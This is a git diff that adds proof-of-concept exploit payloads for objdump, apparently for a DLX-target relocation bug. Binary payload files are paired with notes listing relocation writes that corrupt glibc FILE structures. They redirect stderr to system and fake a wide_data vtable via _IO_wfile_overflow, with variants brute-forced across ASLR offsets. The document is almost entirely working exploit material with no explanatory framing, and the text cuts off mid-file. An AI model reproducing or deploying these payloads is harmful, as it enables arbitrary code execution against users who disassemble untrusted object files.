Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes
new file mode 100644
index 0000000..60bc8f9
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x05
+buf_delta=0xef210000
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin
new file mode 100644
index 0000000..5cea988
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes
new file mode 100644
index 0000000..51c11b5
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x05
+buf_delta=0xef210000
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin
new file mode 100644
index 0000000..79841f5
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes
new file mode 100644
index 0000000..8ba2cee
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x05
+buf_delta=0xf020ff00
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin
new file mode 100644
index 0000000..9eb3932
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.notes
new file mode 100644
index 0000000..641f6ce
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x05
+buf_delta=0xf020ff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin
new file mode 100644
index 0000000..b534929
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes
new file mode 100644
index 0000000..97f797a
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x05
+buf_delta=0xf020ff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin
new file mode 100644
index 0000000..714a463
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes
new file mode 100644
index 0000000..1a1b38c
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x05
+buf_delta=0xf020ff00
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin
new file mode 100644
index 0000000..5a44876
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes
new file mode 100644
index 0000000..77ffde1
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x06
+buf_delta=0xef210000
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin
new file mode 100644
index 0000000..c3bd2df
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes
new file mode 100644
index 0000000..b4830e1
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x06
+buf_delta=0xef210000
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin
new file mode 100644
index 0000000..d255eda
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes
new file mode 100644
index 0000000..b97fe85
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x06
+buf_delta=0xef210000
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin
new file mode 100644
index 0000000..5cea988
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes
new file mode 100644
index 0000000..8f41d5d
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x06
+buf_delta=0xef210000
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
+sec_size_offset=0x38
+
+000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0
+003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0
+006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58
+007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58
+008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c
+009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c
+010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin
new file mode 100644
index 0000000..79841f5
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes
new file mode 100644
index 0000000..ccba346
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=orig
+flag_byte4=0x06
+buf_delta=0xf020ff00
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
